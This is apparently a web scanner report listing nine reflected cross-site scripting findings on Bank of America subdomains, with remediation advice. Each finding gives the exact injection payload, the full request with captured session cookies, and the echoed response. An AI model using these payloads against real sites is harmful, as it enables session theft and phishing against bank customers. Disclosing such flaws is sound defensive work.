XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, BAC HTTP Systems

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://factsaboutfees.bankofamerica.com/servlets/Xml/qanda.xml [REST URL parameter 3] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/servlets/Xml/qanda.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload c216c</title><script>alert(1)</script>ee4e8c1c9fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlets/Xml/qanda.xmlc216c</title><script>alert(1)</script>ee4e8c1c9fa HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/assets/swf/shell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 400 Bad Request
Date: Thu, 06 Oct 2011 14:13:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 400
Connection: close
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:38 GMT;path=/

<html>
<head><title>HTTP 400: illegal filename: /qanda.xmlc216c</title><script>alert(1)</script>ee4e8c1c9fa</title></head>
<body>

<h1>HTTP 400</h1>
<h2>illegal filename: /qanda.xmlc216c</title><
...[SNIP]...

1.2. http://factsaboutfees.bankofamerica.com/servlets/Xml/qanda.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://factsaboutfees.bankofamerica.com
Path:	/servlets/Xml/qanda.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7ff7<script>alert(1)</script>b4a1ce07c57 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlets/Xml/qanda.xmlb7ff7<script>alert(1)</script>b4a1ce07c57 HTTP/1.1
Host: factsaboutfees.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://factsaboutfees.bankofamerica.com/assets/swf/shell.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; session_start_time=1317909771449; state=CT; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; JSESSIONID=7190A465CC2C5D6C39E412EF181081D7; CMAVID=50021315153052143970353; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660

Response

HTTP/1.1 400 Bad Request
Date: Thu, 06 Oct 2011 14:13:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 384
Connection: close
Set-Cookie: NSC_mfbso.cbolpgbnfsjdb.dpn=ffffffff09c9029445525d5f4f58455e445a4a423660;expires=Thu, 06-Oct-2011 15:13:36 GMT;path=/

<html>
<head><title>HTTP 400: illegal filename: /qanda.xmlb7ff7<script>alert(1)</script>b4a1ce07c57</title></head>
<body>

<h1>HTTP 400</h1>
<h2>illegal filename: /qanda.xmlb7ff7<script>alert(1)</script>b4a1ce07c57</h2>
...[SNIP]...

1.3. http://homeloans.bankofamerica.com/dynamic/vars.jsp [cm_sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/dynamic/vars.jsp

Issue detail

The value of the cm_sp request parameter is copied into the HTML document as plain text between tags. The payload b3ccc<script>alert(1)</script>00307717c88 was submitted in the cm_sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/vars.jsp?cm_sp=CRE-Multiproduct-_-Homeloans-_-CR16LT0004_GetStarted_HomeLoanGuideENb3ccc<script>alert(1)</script>00307717c88& HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://webmedia.bankofamerica.com/homeloanguide/index.html?cm_sp=CRE-Multiproduct-_-Homeloans-_-CR16LT0004_GetStarted_HomeLoanGuideEN&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; CMAVID=50021315153052143970353; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; state=CT; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; cmRS=&t1=1317908617284&t2=1317908623919&t3=1317908647467&t4=1317908615946&lti=1317908647467&ln=HLGHomeLoanGuide&hr=javascript%3Avoid%280%29&fti=&fn=&ac=&fd=&uer=&fu=&pi=MHEI%3AMKT%3Amortgage%3ACD1en%3BHomeLoanGuide&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; JSESSIONID=37AC77CE1F7C8B66CBD39D39ECA87546

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:44:53 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 406

   cd1_afid = 'default';
   cd1_afid_tfn = '1.800.909.8217';
   cd1_query_string = 'cm_sp=CRE-Multiproduct-_-Homeloans-_-CR16LT0004_GetStarted_HomeLoanGuideENb3ccc<script>alert(1)</script>00307717c88&';
   cd1_mlo_nbkid = "";
   cd1_mlo_nmlsid = "";
   cd1_mlo_contact_name = "";
   cd1_mlo_state = "";
   cd1_mlo_website_contact_me = "";
   cd1_mlo_website_prequal_english = "";
   cd1_mlo_website_prequal_spanish
...[SNIP]...

1.4. http://homeloans.bankofamerica.com/dynamic/vars.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://homeloans.bankofamerica.com
Path:	/dynamic/vars.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 32acd<script>alert(1)</script>e59e0cccfa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/vars.jsp?cm_sp=CRE-Multiproduct-_-Homeloans-_-CR16LT0004_GetStarted_HomeLoanGuideEN&&32acd<script>alert(1)</script>e59e0cccfa3=1 HTTP/1.1
Host: homeloans.bankofamerica.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://webmedia.bankofamerica.com/homeloanguide/index.html?cm_sp=CRE-Multiproduct-_-Homeloans-_-CR16LT0004_GetStarted_HomeLoanGuideEN&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMREFERRAL=false; ORIGINATIONS.BANKOFAMERICA.COM=NVH9yAytgRfRe9B2T5E5DnJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCGMdnxtGnFYcLLS4d0z1cVF6+Eadv4AI9+bNPv01vshxlZTgPSXNNZwboayRUVJc8EVeQMImPZgUdhtBeLKW4JXjsjhtMBpdvWxy/US6Q2nS88C2FauT066xHiMY2SsLR3p7WQpFbtuUl0vJm5f5Gt1GoVOJnXXfIQtYGZ88/jMIUeDn0VIPIj14ESopT5jmKrcAXb7xIj67CZIi6U/51S8dduhgi0ysC3fSV1SfAcARcnDbZ6BQQfHYxACjVEeuI5aZ/E6XgzlzfXowxgSiv33laZECGFyhCxSQPG/VHBg+ncz9NKOm3bqtUoxC7mmihAedmYO2XudnvWKZc6jz9I/TVSJNdSVwZpCBsTmbJnhVSNVJgG7SH5LGXoyywRrSog5d9VAHEw/bmPePxAOUiC/zAmxxDcqBVN6aEqZJdVlZLMiG6HpVXshVGonkEv5J5k14qsR79fahnqulfNjKlqxpBfdqqdFp9Kx7YqmM+dM5ofD3FgqVRWmMk59qcGkDn; CMAVID=50021315153052143970353; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN; throttle_value=72; NSC_CbolPgBnfsjdb=445b32097852; state=CT; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; cmRS=&t1=1317908617284&t2=1317908623919&t3=1317908647467&t4=1317908615946&lti=1317908647467&ln=HLGHomeLoanGuide&hr=javascript%3Avoid%280%29&fti=&fn=&ac=&fd=&uer=&fu=&pi=MHEI%3AMKT%3Amortgage%3ACD1en%3BHomeLoanGuide&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; JSESSIONID=37AC77CE1F7C8B66CBD39D39ECA87546

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 13:44:57 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 409

   cd1_afid = 'default';
   cd1_afid_tfn = '1.800.909.8217';
   cd1_query_string = 'cm_sp=CRE-Multiproduct-_-Homeloans-_-CR16LT0004_GetStarted_HomeLoanGuideEN&&32acd<script>alert(1)</script>e59e0cccfa3=1';
   cd1_mlo_nbkid = "";
   cd1_mlo_nmlsid = "";
   cd1_mlo_contact_name = "";
   cd1_mlo_state = "";
   cd1_mlo_website_contact_me = "";
   cd1_mlo_website_prequal_english = "";
   cd1_mlo_website_prequal_spanis
...[SNIP]...

1.5. https://idprotect.bankofamerica.com/code.asp [Fr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.bankofamerica.com
Path:	/code.asp

Issue detail

The value of the Fr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62107"><script>alert(1)</script>67327d707a1 was submitted in the Fr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code.asp?Fr=Re62107"><script>alert(1)</script>67327d707a1 HTTP/1.1
Host: idprotect.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8426
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:35:09 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:15:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>


<title>Bank of America | Identi
...[SNIP]...
<form name="frmCS" method="post" action="../ASP/CheckPromo.asp?Fr=Re62107"><script>alert(1)</script>67327d707a1">
...[SNIP]...

1.6. https://idprotect.bankofamerica.com/code.asp [Fr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.bankofamerica.com
Path:	/code.asp

Issue detail

The value of the Fr request parameter is copied into an HTML comment. The payload bfa58--><script>alert(1)</script>47bb9f2731 was submitted in the Fr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /code.asp?Fr=Rebfa58--><script>alert(1)</script>47bb9f2731 HTTP/1.1
Host: idprotect.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8426
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:35:13 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:15:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>


<title>Bank of America | Identi
...[SNIP]...
<a href="JavaScript:Check_Promo" onClick="PromoCS(frmCS,'Fr=Rebfa58--><script>alert(1)</script>47bb9f2731');return false;" tabindex="2">
...[SNIP]...

1.7. https://idprotect.bankofamerica.com/code.asp [Fr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.bankofamerica.com
Path:	/code.asp

Issue detail

The value of the Fr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27527"-alert(1)-"a107dd2d373 was submitted in the Fr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /code.asp?Fr=Re27527"-alert(1)-"a107dd2d373 HTTP/1.1
Host: idprotect.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8366
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:35:11 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:15:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>


<title>Bank of America | Identi
...[SNIP]...

...[SNIP]...

1.8. https://idprotect.bankofamerica.com/code.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.bankofamerica.com
Path:	/code.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba8f"><script>alert(1)</script>4f34154dc1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /code.asp?eba8f"><script>alert(1)</script>4f34154dc1b=1 HTTP/1.1
Host: idprotect.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8414
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:35:09 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:15:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>


<title>Bank of America | Identi
...[SNIP]...
<form name="frmCS" method="post" action="../ASP/CheckPromo.asp?eba8f"><script>alert(1)</script>4f34154dc1b=1">
...[SNIP]...

1.9. https://idprotect.bankofamerica.com/code.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.bankofamerica.com
Path:	/code.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6bcbe--><script>alert(1)</script>e63795b5b6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /code.asp?6bcbe--><script>alert(1)</script>e63795b5b6b=1 HTTP/1.1
Host: idprotect.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8418
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:35:12 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:15:12 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>


<title>Bank of America | Identi
...[SNIP]...
<a href="JavaScript:Check_Promo" onClick="PromoCS(frmCS,'6bcbe--><script>alert(1)</script>e63795b5b6b=1');return false;" tabindex="2">
...[SNIP]...

